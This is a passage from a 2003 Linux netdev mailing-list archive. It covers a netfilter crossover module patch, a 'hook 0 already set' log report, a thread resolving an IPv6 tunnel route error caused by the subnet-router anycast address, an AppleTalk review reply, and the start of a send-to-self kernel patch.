*/ > + if ((*pskb)->nh.iph->daddr == devinfo1.phantom) { > + printk(KERN_DEBUG "dev1: %u.%u.%u.%u->%u.%u.%u.%u" > + " becomes %u.%u.%u.%u->%u.%u.%u.%u\n", > + NIPQUAD((*pskb)->nh.iph->saddr), > + NIPQUAD((*pskb)->nh.iph->daddr), > + NIPQUAD(devinfo2.phantom), > + NIPQUAD(devinfo2.ifaddr)); > + if (!nat_header(*pskb, devinfo2.phantom, devinfo2.ifaddr)) > + return NF_DROP; > + } else if ((*pskb)->nh.iph->daddr == devinfo2.phantom) { > + printk(KERN_DEBUG "dev1: %u.%u.%u.%u->%u.%u.%u.%u" > + " becomes %u.%u.%u.%u->%u.%u.%u.%u\n", > + NIPQUAD((*pskb)->nh.iph->saddr), > + NIPQUAD((*pskb)->nh.iph->daddr), > + NIPQUAD(devinfo1.phantom), > + NIPQUAD(devinfo1.ifaddr)); > + if (!nat_header(*pskb, devinfo1.phantom, devinfo1.ifaddr)) > + return NF_DROP; > + } > + > + return NF_ACCEPT; > +} > + > +static struct nf_hook_ops xover_ops > += { .hook = xover_hook, > + .owner = THIS_MODULE, > + .pf = PF_INET, > + .hooknum = NF_IP_POST_ROUTING, > + .priority = NF_IP_PRI_MANGLE, > +}; > + > +static int __set_dev(const char *name, struct ifinfo *ifi) > +{ > + struct net_device *dev; > + struct in_device *indev; > + > + dev = dev_get_by_name(name); > + if (!dev) > + goto fail; > + indev = __in_dev_get(dev); > + if (!indev || !indev->ifa_list) > + goto put_fail; > + > + ifi->ifaddr = indev->ifa_list->ifa_address; > + ifi->phantom = htonl(ntohl(indev->ifa_list->ifa_address) + 1); > + if (ifi->phantom == indev->ifa_list->ifa_broadcast) > + goto put_fail; > + > + strlcpy(ifi->name, name, sizeof(ifi->name)); > + printk(KERN_INFO "ip_crossover: phantom for %s: %u.%u.%u.%u\n", > + ifi->name, NIPQUAD(ifi->phantom)); > + return 0; > + > +put_fail: > + dev_put(dev); > +fail: > + printk(KERN_WARNING "ip_crossover: device %s is not usable.\n", name); > + return -ENOENT; > +} > + > +#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,5,50) > +static int set_dev(const char *val, struct kernel_param *kp) > +{ > + return __set_dev(val, kp->arg); > +} > +module_param_call(dev1, set_dev, NULL, &devinfo1, 0); > 
+module_param_call(dev2, set_dev, NULL, &devinfo2, 0); > + > +#define compat_parse_params() > +#else > +static char *dev1, *dev2; > + > +MODULE_PARM(dev1, "s"); > +MODULE_PARM(dev2, "s"); > + > +static void compat_parse_params(void) > +{ > + if (dev1) > + __set_dev(dev1, &devinfo1); > + if (dev2) > + __set_dev(dev2, &devinfo2); > +} > +#endif /* KERNEL_VERSION */ > + > +static int __init init(void) > +{ > + compat_parse_params(); > + > + if (!devinfo1.name[0] || !devinfo2.name[0]) { > + printk(KERN_ERR "ip_crossover: need dev1 and dev2 args\n"); > + return -EINVAL; > + } > + > + return nf_register_hook(&xover_ops); > +} > + > +static void __exit fini(void) > +{ > + struct net_device *dev; > + > + nf_unregister_hook(&xover_ops); > + > + /* Release devices. */ > + dev = dev_get_by_name(devinfo1.name); > + dev_put(dev); > + dev_put(dev); > + > + dev = dev_get_by_name(devinfo2.name); > + dev_put(dev); > + dev_put(dev); > +} > + > +module_init(init); > +module_exit(fini); > +MODULE_LICENSE("GPL"); > +MODULE_PARM_DESC(dev1, "First device for crossover (required)"); > +MODULE_PARM_DESC(dev2, "Second device for crossover (required)"); > > -- > Anyone who quotes me in their sig is an idiot. -- Rusty Russell. -- James R. Leu From davej@suse.de Thu Jul 10 08:38:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 08:38:49 -0700 (PDT) Received: from Cantor.suse.de (ns.suse.de [213.95.15.193]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AFcb2x009666 for ; Thu, 10 Jul 2003 08:38:38 -0700 Received: from Hermes.suse.de (Hermes.suse.de [213.95.15.136]) by Cantor.suse.de (Postfix) with ESMTP id C9EE414DFD for ; Thu, 10 Jul 2003 17:38:31 +0200 (MEST) Date: Thu, 10 Jul 2003 17:38:31 +0200 From: Dave Jones To: netdev@oss.sgi.com Subject: hook 0 already set. 
Message-ID: <20030710173831.B31068@suse.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i X-archive-position: 3896 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davej@suse.de Precedence: bulk X-list: netdev My 2 NIC proxy arp firewall started spitting these out in 2.5.. Jul 9 22:17:52 equinox kernel: nf_hook: hook 0 already set. Jul 9 22:17:52 equinox kernel: skb: pf=0 (unowned) dev=eth0 len=46 There's no real pattern that I can observe to trigger them, although... (root@equinox:davej)# grep "hook 0 already set" /var/log/syslog.0 | wc -l 7660 It does seem to happen quite a lot in this particular setup. Dave -- | Dave Jones. http://www.codemonkey.org.uk | SuSE Labs From hogarth@theirongiant.lochness.weebeastie.net Thu Jul 10 08:43:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 08:43:38 -0700 (PDT) Received: from nessie.weebeastie.net (nessie.weebeastie.net [61.8.7.205]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AFhQ2x010008 for ; Thu, 10 Jul 2003 08:43:28 -0700 Received: from theirongiant.lochness.weebeastie.net (theirongiant.lochness.weebeastie.net [10.1.1.2]) by nessie.weebeastie.net (8.12.3/8.12.3/Debian-6.4) with ESMTP id h6AFgvDb002172 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=FAIL); Fri, 11 Jul 2003 01:42:57 +1000 Received: from theirongiant.lochness.weebeastie.net (localhost [127.0.0.1]) by theirongiant.lochness.weebeastie.net (8.12.3/8.12.3/Debian-6.4) with ESMTP id h6AFh74u012437 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Fri, 11 Jul 2003 01:43:07 +1000 Received: (from hogarth@localhost) by theirongiant.lochness.weebeastie.net (8.12.3/8.12.3/Debian-6.4) id h6AFh3C1012436; Fri, 11 Jul 2003 01:43:03 +1000 Date: Fri, 11 Jul 2003 01:43:03 +1000 From: CaT To: yoshfuji@linux-ipv6.org, linux-kernel@vger.kernel.org Cc: netdev@oss.sgi.com, 
pekkas@netcore.fi Subject: 2.4.21+ - IPv6 over IPv4 tunneling b0rked Message-ID: <20030710154302.GE1722@zip.com.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i Organisation: Furball Inc. X-archive-position: 3897 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: cat@zip.com.au Precedence: bulk X-list: netdev With 2.4.21-pre2 I can get a nice tunnel going over my ppp connection and as such get ipv6 connectivity. I then went to 2.4.21 and then to 2.4.22-pre4 and bringing up the tunnel fails as follows: [01:37:04] root@nessie:/usr/src/linux>> ifup --verbose sit1 Configuring interface sit1=sit1 (inet6) run-parts /etc/network/if-pre-up.d ip tunnel add sit1 mode sit remote 138.25.6.14 ip link set sit1 up ip addr add 3ffe:8001:000c:ffff::37/127 dev sit1 ip route add ::/0 via 3ffe:8001:000c:ffff::36 RTNETLINK answers: Invalid argument Basically nothing gets through. Any attempts to ping/connect past my gw fail and pinging the external gw results in packets coming back from my gw (though with the eth0 IP addy) as if I were pinging it instead. ie: 15 [01:41:34] hogarth@theirongiant:/home/hogarth>> ping6 3ffe:8001:000c:ffff::36 PING 3ffe:8001:000c:ffff::36(3ffe:8001:c:ffff::36) from 3ffe:8002:1005::2 : 56 data bytes 64 bytes from 3ffe:8002:1005::1: icmp_seq=1 ttl=64 time=0.159 ms 64 bytes from 3ffe:8002:1005::1: icmp_seq=2 ttl=64 time=0.118 ms 64 bytes from 3ffe:8002:1005::1: icmp_seq=3 ttl=64 time=0.109 ms 64 bytes from 3ffe:8002:1005::1: icmp_seq=4 ttl=64 time=0.116 ms 64 bytes from 3ffe:8002:1005::1: icmp_seq=5 ttl=64 time=0.114 ms --- 3ffe:8001:000c:ffff::36 ping statistics --- 5 packets transmitted, 5 received, 0% loss, time 3999ms rtt min/avg/max/mdev = 0.109/0.123/0.159/0.019 ms Mind you, the same exact config works beautifully under 2.4.21-pre2. 
If there are any patches you want me to try or help in any other way (as far as debugging goes anyways :) then holler. :) -- "How can I not love the Americans? They helped me with a flat tire the other day," he said. - http://www.toledoblade.com/apps/pbcs.dll/artikkel?SearchID=73139162287496&Avis=TO&Dato=20030624&Kategori=NEWS28&Lopenr=106240111&Ref=AR From acme@conectiva.com.br Thu Jul 10 08:46:09 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 08:46:15 -0700 (PDT) Received: from orion.netbank.com.br (orion.netbank.com.br [200.203.199.90]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AFk72x010320 for ; Thu, 10 Jul 2003 08:46:09 -0700 Received: from [200.181.170.115] (helo=brinquendo.conectiva.com.br) by orion.netbank.com.br with asmtp (Exim 3.33 #1) id 19aUpI-0001e2-00; Thu, 10 Jul 2003 03:22:44 -0300 Received: by brinquendo.conectiva.com.br (Postfix, from userid 500) id 9D62C1966C; Thu, 10 Jul 2003 06:20:11 +0000 (UTC) Date: Thu, 10 Jul 2003 03:20:11 -0300 From: Arnaldo Carvalho de Melo To: Stephen Hemminger Cc: "David S. Miller" , Jay Schulist , netdev@oss.sgi.com, linux-atalk@lists.netspace.org Subject: Re: [[RFT] convert appletalk over to new protocol Message-ID: <20030710062010.GC11670@conectiva.com.br> References: <20030709131300.660c052f.shemminger@osdl.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030709131300.660c052f.shemminger@osdl.org> X-Url: http://advogato.org/person/acme Organization: Conectiva S.A. User-Agent: Mutt/1.5.4i X-archive-position: 3898 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: acme@conectiva.com.br Precedence: bulk X-list: netdev Em Wed, Jul 09, 2003 at 01:13:00PM -0700, Stephen Hemminger escreveu: > This fixes appletalk ddp protocol to address a couple of issues: > - routing code was holding a reference to device without doing ref counting. 
> - packet interface was old style > - add shared buffer checks > - add pullup's where needed > - change checksum to handle fragmented sk_buff's > - clean up comments to match above changes. > > I don't have real appletalk test infrastructure, and given the checksum change it should > be tested against real Apple hardware. It does build, and loads/unloads fine. I can > bring up the netatalk stuff without problem but have nothing to talk to it. I'll take a look, but at first glance the sock_hold/put calls are missing. That is OK for now when adding to and removing from a list of socks, thanks to the hlist conversion work, but it needs to be done in routines that search a list of socks and return a sock. I do have a good Appletalk test bed, with m68k and ppc macs, but I'll only be able to test this next Wednesday, as I'll be on a business trip starting tomorrow. Good work from what I saw at a quick glance; I will review it further and provide comments, probably in the next few days. - Arnaldo From yoshfuji@linux-ipv6.org Thu Jul 10 08:54:15 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 08:54:24 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AFsD2x010686 for ; Thu, 10 Jul 2003 08:54:14 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6AFtgBo001142; Fri, 11 Jul 2003 00:55:42 +0900 Date: Fri, 11 Jul 2003 00:55:42 +0900 (JST) Message-Id: <20030711.005542.04973601.yoshfuji@linux-ipv6.org> To: cat@zip.com.au Cc: linux-kernel@vger.kernel.org, netdev@oss.sgi.com, pekkas@netcore.fi Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <20030710154302.GE1722@zip.com.au> References: <20030710154302.GE1722@zip.com.au> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 
D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3899 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <20030710154302.GE1722@zip.com.au> (at Fri, 11 Jul 2003 01:43:03 +1000), CaT says: > With 2.4.21-pre2 I can get a nice tunnel going over my ppp connection > and as such get ipv6 connectivity. I think went to 2.4.21 and then to > 2.4.22-pre4 and bringing up the tunnel fails as follows: : > ip addr add 3ffe:8001:000c:ffff::37/127 dev sit1 > ip route add ::/0 via 3ffe:8001:000c:ffff::36 > RTNETLINK answers: Invalid argument This is not a bug, but rather a misconfiguration; you cannot use prefix::, which is the mandatory subnet-router anycast address, as a unicast address. Thank you. 
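To illustrate the point about prefix::, here is a minimal sketch that is not part of the original message. It assumes Python 3 and its standard ipaddress module, and the helper name subnet_router_anycast is made up for this example. The subnet-router anycast address is the prefix with all host bits set to zero, so for the /127 configured on sit1 it is exactly the ::36 address that the default route points at.

```python
import ipaddress


def subnet_router_anycast(interface_cidr):
    """Return the prefix with all host bits zeroed (hypothetical helper)."""
    iface = ipaddress.ip_interface(interface_cidr)
    return iface.network.network_address


# Values taken from the ifup output quoted in this thread.
gateway = ipaddress.ip_address("3ffe:8001:000c:ffff::36")

# With the /127 from the report, the gateway IS the anycast address.
anycast_127 = subnet_router_anycast("3ffe:8001:000c:ffff::37/127")
print(anycast_127, gateway == anycast_127)

# With a /64, the anycast address is prefix:: and ::36 is an ordinary address.
anycast_64 = subnet_router_anycast("3ffe:8001:000c:ffff::37/64")
print(anycast_64, gateway == anycast_64)
```

Under these assumptions the first comparison is true and the second is false, which matches the suggestion later in the thread to use /64 rather than /127 on the tunnel.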
-- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From hogarth@theirongiant.lochness.weebeastie.net Thu Jul 10 08:58:17 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 08:58:22 -0700 (PDT) Received: from nessie.weebeastie.net (nessie.weebeastie.net [61.8.7.205]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AFwB2x011013 for ; Thu, 10 Jul 2003 08:58:15 -0700 Received: from theirongiant.lochness.weebeastie.net (theirongiant.lochness.weebeastie.net [10.1.1.2]) by nessie.weebeastie.net (8.12.3/8.12.3/Debian-6.4) with ESMTP id h6AFvrDb003528 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=FAIL); Fri, 11 Jul 2003 01:57:53 +1000 Received: from theirongiant.lochness.weebeastie.net (localhost [127.0.0.1]) by theirongiant.lochness.weebeastie.net (8.12.3/8.12.3/Debian-6.4) with ESMTP id h6AFw34u012652 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Fri, 11 Jul 2003 01:58:03 +1000 Received: (from hogarth@localhost) by theirongiant.lochness.weebeastie.net (8.12.3/8.12.3/Debian-6.4) id h6AFw3Z8012651; Fri, 11 Jul 2003 01:58:03 +1000 Date: Fri, 11 Jul 2003 01:58:02 +1000 From: CaT To: "YOSHIFUJI Hideaki / ?$B5HF#1QL@" Cc: linux-kernel@vger.kernel.org, netdev@oss.sgi.com, pekkas@netcore.fi Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked Message-ID: <20030710155802.GF1722@zip.com.au> References: <20030710154302.GE1722@zip.com.au> <20030711.005542.04973601.yoshfuji@linux-ipv6.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030711.005542.04973601.yoshfuji@linux-ipv6.org> User-Agent: Mutt/1.3.28i Organisation: Furball Inc. 
X-archive-position: 3900 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: cat@zip.com.au Precedence: bulk X-list: netdev On Fri, Jul 11, 2003 at 12:55:42AM +0900, YOSHIFUJI Hideaki / ?$B5HF#1QL@ wrote: > > ip addr add 3ffe:8001:000c:ffff::37/127 dev sit1 > > ip route add ::/0 via 3ffe:8001:000c:ffff::36 > > RTNETLINK answers: Invalid argument > > This is not bug, but rather misconfiguration; > you cannot use prefix::, which is mandatory subnet routers > anycast address, as unicast address. Ok. I'm a bit lost then. What should the line be then? To me the above makes sense (and used to work), but then I'm not that experienced with IPv6... -- "How can I not love the Americans? They helped me with a flat tire the other day," he said. - http://www.toledoblade.com/apps/pbcs.dll/artikkel?SearchID=73139162287496&Avis=TO&Dato=20030624&Kategori=NEWS28&Lopenr=106240111&Ref=AR From pekkas@netcore.fi Thu Jul 10 09:08:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 09:08:46 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AG8b2x011477 for ; Thu, 10 Jul 2003 09:08:38 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6AG8Kg18686; Thu, 10 Jul 2003 19:08:20 +0300 Date: Thu, 10 Jul 2003 19:08:20 +0300 (EEST) From: Pekka Savola To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: cat@zip.com.au, , Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: <20030711.005542.04973601.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 X-archive-position: 3901 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Fri, 11 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B wrote: > In article 
<20030710154302.GE1722@zip.com.au> (at Fri, 11 Jul 2003 01:43:03 +1000), CaT says: > > > With 2.4.21-pre2 I can get a nice tunnel going over my ppp connection > > and as such get ipv6 connectivity. I think went to 2.4.21 and then to > > 2.4.22-pre4 and bringing up the tunnel fails as follows: > : > > ip addr add 3ffe:8001:000c:ffff::37/127 dev sit1 > > ip route add ::/0 via 3ffe:8001:000c:ffff::36 > > RTNETLINK answers: Invalid argument > > This is not bug, but rather misconfiguration; > you cannot use prefix::, which is mandatory subnet routers > anycast address, as unicast address. While technically correct, I'm still not sure if this is (pragmatically) the correct approach. It's OK to set a default route to go to the subnet routers anycast address (so, setting a route to prefix:: should not give you EINVAL). -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From yoshfuji@linux-ipv6.org Thu Jul 10 09:17:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 09:17:35 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AGHT2x011859 for ; Thu, 10 Jul 2003 09:17:30 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6AGIxBo001312; Fri, 11 Jul 2003 01:18:59 +0900 Date: Fri, 11 Jul 2003 01:18:58 +0900 (JST) Message-Id: <20030711.011858.117900702.yoshfuji@linux-ipv6.org> To: pekkas@netcore.fi Cc: cat@zip.com.au, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling broken From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: References: <20030711.005542.04973601.yoshfuji@linux-ipv6.org> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 
48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3902 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article (at Thu, 10 Jul 2003 19:08:20 +0300 (EEST)), Pekka Savola says: > While technically correct, I'm still not sure if this is (pragmatically) > the correct approach. It's OK to set a default route to go to the > subnet routers anycast address (so, setting a route to prefix:: should > not give you EINVAL). But, on the other side cannot use prefix::, and the setting is rather non-sense. We should educate people not to use /127; use /64 instead. v6ops? 
:-) -- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From pekkas@netcore.fi Thu Jul 10 09:20:15 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 09:20:21 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AGKB2x012185 for ; Thu, 10 Jul 2003 09:20:14 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6AGJvM18828; Thu, 10 Jul 2003 19:19:57 +0300 Date: Thu, 10 Jul 2003 19:19:57 +0300 (EEST) From: Pekka Savola To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: cat@zip.com.au, , Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling broken In-Reply-To: <20030711.011858.117900702.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 X-archive-position: 3903 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Fri, 11 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B wrote: > In article (at Thu, 10 Jul 2003 19:08:20 +0300 (EEST)), Pekka Savola says: > > > While technically correct, I'm still not sure if this is (pragmatically) > > the correct approach. It's OK to set a default route to go to the > > subnet routers anycast address (so, setting a route to prefix:: should > > not give you EINVAL). > > But, on the other side cannot use prefix::, and > the setting is rather non-sense. Not really. From the host perspective: "I want to set default route to SOME default router" (there may be multiple routers in the LAN, while only one at a time is actively responding to the anycast address; if that one goes away, another one takes its place.) > We should educate people not to use /127; use /64 instead. > v6ops? :-) That's another story.. -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. 
Networks. Security. -- George R.R. Martin: A Clash of Kings From mika.liljeberg@welho.com Thu Jul 10 09:27:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 09:27:27 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AGRD2x012529 for ; Thu, 10 Jul 2003 09:27:15 -0700 Received: from hades.pp.htv.fi (localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6AGRGZj006542; Thu, 10 Jul 2003 19:27:16 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6AGRDrC006541; Thu, 10 Jul 2003 19:27:13 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: Mika Liljeberg To: CaT Cc: yoshfuji@linux-ipv6.org, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, pekkas@netcore.fi In-Reply-To: <20030710154302.GE1722@zip.com.au> References: <20030710154302.GE1722@zip.com.au> Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1057854432.3588.2.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.0 Date: 10 Jul 2003 19:27:13 +0300 X-archive-position: 3904 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev On Thu, 2003-07-10 at 18:43, CaT wrote: > ip tunnel add sit1 mode sit remote 138.25.6.14 > ip link set sit1 up > ip addr add 3ffe:8001:000c:ffff::37/127 dev sit1 > ip route add ::/0 via 3ffe:8001:000c:ffff::36 > RTNETLINK answers: Invalid argument Try this: ip route add ::/0 dev sit1 MikaL From greearb@candelatech.com Thu Jul 10 09:52:58 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 09:53:12 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id 
h6AGqv2x014387 for ; Thu, 10 Jul 2003 09:52:58 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6AGqhKk024337; Thu, 10 Jul 2003 09:52:44 -0700 Message-ID: <3F0D99DB.5040206@candelatech.com> Date: Thu, 10 Jul 2003 09:52:43 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: jleu@mindspring.com CC: Rusty Russell , netdev@oss.sgi.com, netfilter-devel@lists.netfilter.org, anton@samba.org Subject: Re: [PATCH] Netfilter crossover module. References: <20030710084820.909D12C0DA@lists.samba.org> <20030710090643.A10820@mindspring.com> In-Reply-To: <20030710090643.A10820@mindspring.com> Content-Type: multipart/mixed; boundary="------------010705080708070503070404" X-archive-position: 3905 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev This is a multi-part message in MIME format. --------------010705080708070503070404 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit James R. Leu wrote: > Between you and Ben Greear the linux kernel will have every possible > scheme for sending packets to your self. > > I still think my work on this (Virtual routing and forwarding: > http://linux-vrf.sf.net/) is the less perverted(*) then the work that either > you or Ben have come up with. Plus it has other applications besides > just being able to send packets to your self. > > * in terms of the concept, not necessarily the actual implementation. >>It'd be nice to have the module hardwire the arps itself, but this was >>quickest. Patch welcome. It's likely that with my patch you wouldn't have to hard-wire arps at all. 
The primary thing that my patch does is to let a machine answer arps from a local interface (over the external interface). Then routing to self can happen by simply(?) binding to the local IP of your choice and using policy-based routing to route correctly. (You can loop-back through a router with this patch, for example.) So, maybe both patches are useful together.... I can't find where I posted my patch last time, so it is attached again for reference. It contains a typo-fix in a comment that may be worthy of inclusion by itself some day :) Also, when nettool (ethtool) becomes generic, the ioctl code can be configured through the nettool api, so that new ioctl will go a way. Thanks, Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear --------------010705080708070503070404 Content-Type: text/plain; name="sts_2.4.20.patch" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="sts_2.4.20.patch" --- linux-2.4.20/include/linux/sockios.h 2001-11-07 14:39:36.000000000 -0800 +++ linux-2.4.20.c3/include/linux/sockios.h 2003-03-18 14:32:53.000000000 -0800 @@ -65,6 +65,8 @@ #define SIOCDIFADDR 0x8936 /* delete PA address */ #define SIOCSIFHWBROADCAST 0x8937 /* set hardware broadcast addr */ #define SIOCGIFCOUNT 0x8938 /* get number of devices */ +#define SIOCGIFWEIGHT 0x8939 /* get weight of device, in stones */ +#define SIOCSIFWEIGHT 0x893a /* set weight of device, in stones */ #define SIOCGIFBR 0x8940 /* Bridging support */ #define SIOCSIFBR 0x8941 /* Set bridging options */ @@ -92,6 +94,10 @@ #define SIOCGRARP 0x8961 /* get RARP table entry */ #define SIOCSRARP 0x8962 /* set RARP table entry */ +/* MAC address based VLAN control calls */ +#define SIOCGIFMACVLAN 0x8965 /* Mac address multiplex/demultiplex support */ +#define SIOCSIFMACVLAN 0x8966 